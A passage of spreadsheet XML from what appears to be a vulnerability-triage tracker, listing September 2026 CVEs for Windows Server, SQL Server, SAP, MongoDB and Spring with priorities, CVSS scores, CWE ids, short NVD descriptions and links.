      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77493</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78445</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76969</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S16"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T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82067</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="S17"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T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79571</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S18"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T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79571</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66768</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="S19"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T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66768</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69854</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62706</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66814</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66818</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66819</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66820</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K25" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67368</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67368</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67370</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67373</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67380</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K29" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67381</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
